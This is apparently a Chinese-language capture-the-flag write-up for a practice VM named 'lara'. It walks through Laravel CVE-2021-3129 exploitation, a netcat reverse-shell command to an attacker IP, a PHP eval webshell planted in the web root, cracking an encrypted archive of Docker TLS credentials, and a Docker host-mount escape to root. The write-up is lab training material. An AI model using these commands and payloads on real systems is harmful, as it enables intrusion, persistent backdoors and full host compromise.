Loading

群友靶机lara复现

lara

nmap -p- 192.168.10.13                           
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-18 07:21 EST
Nmap scan report for lara (192.168.10.13)
Host is up (0.00085s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8000/tcp open  http-alt
MAC Address: 08:00:27:33:87:C0 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

80端口看起来没有东西,8000端口是个laravel,看起来是要打现有的poc。感觉是要去打CVE-2021-3129,但是试了几个poc都打不通。

joshuavanderpoll/CVE-2021-3129: Laravel RCE Exploit Script - CVE-2021-3129 (user-friendly with automatic log detection)这份可以打通。

直接反弹shell。

python3 poc.py --host http://192.168.10.13:8000/ --exec "busybox nc 192.168.10.11 6666 -e /bin/sh" --no-cache --force --chain laravel/rce12

发现好像提升不了稳定shell,看了一眼根目录发现.dockerenv,应该是docker环境了。不知道咋下手,没有学过docker逃逸。然后发现可以直接在/var/www/html下写马。直接往80端口下写马。

echo '<?php @eval($_POST["cmd"]);?>' > z.php
cat z.php
<?php @eval($_POST["cmd"]);?>

蚁剑连接拿下uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)权限。

注意到alice用户下发现openssl enc -aes-256-cbc -in certs.tar.gz -out tar.gz.enc -iter 10000 -pbkdf2还有一个.enc文件。

蚁剑下载不下来,直接xxd -p .enc然后from hex搞下来

让ai写个爆破脚本解密一下,密码060606拿到certs,是docker api凭证。socat把流量转发出来。./socat TCP-LISTEN:1234,fork,bind=0.0.0.0 TCP:127.0.0.1:2376

docker --tls \
    --tlscacert=ca.pem \
    --tlscert=client-cert.pem \
    --tlskey=client-key.pem \
    -H=tcp://192.168.10.13:1234 \
    version
Client:
 Version:           27.5.1+dfsg4
 API version:       1.47
 Go version:        go1.24.9
 Git commit:        cab968b3
 Built:             Thu Nov  6 10:43:49 2025
 OS/Arch:           linux/amd64
 Context:           default

Server:
 Engine:
  Version:          28.3.3
  API version:      1.51 (minimum version 1.24)
  Go version:       go1.24.11
  Git commit:       bea959c7b793b32a893820b97c4eadc7c87fabb0
  Built:            Tue Dec  2 23:05:51 2025
  OS/Arch:          linux/amd64
  Experimental:     false
 containerd:
  Version:          v2.1.5
  GitCommit:        fcd43222d6b07379a4be9786bda52438f0dd16a1
 runc:
  Version:          1.3.4
  GitCommit:        d842d7719497cc3b774fd71620278ac9e17710e0
 docker-init:
  Version:          0.19.0
  GitCommit:

提权

docker --tls \
    --tlscacert=ca.pem \
    --tlscert=client-cert.pem \
    --tlskey=client-key.pem \
    -H=tcp://192.168.10.13:1234 \
    images 
REPOSITORY     TAG       IMAGE ID       CREATED       SIZE
laravel-vuln   latest    aaf7bbe495b7   3 weeks ago   141MB
#直接拿现成的镜像用
docker --tls \
    --tlscacert=ca.pem \
    --tlscert=client-cert.pem \
    --tlskey=client-key.pem \
    -H=tcp://192.168.10.13:1234 \
    run -v /:/mnt --rm -it laravel-vuln chroot /mnt /bin/sh
/ # id
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
/ # cat /root/root.txt
flag{root-ede49d353365dfcf95b6bf8df1b7a2dc}

至此提权成功。

posted @ 2026-01-19 22:05  场-room  阅读(0)  评论(0)    收藏  举报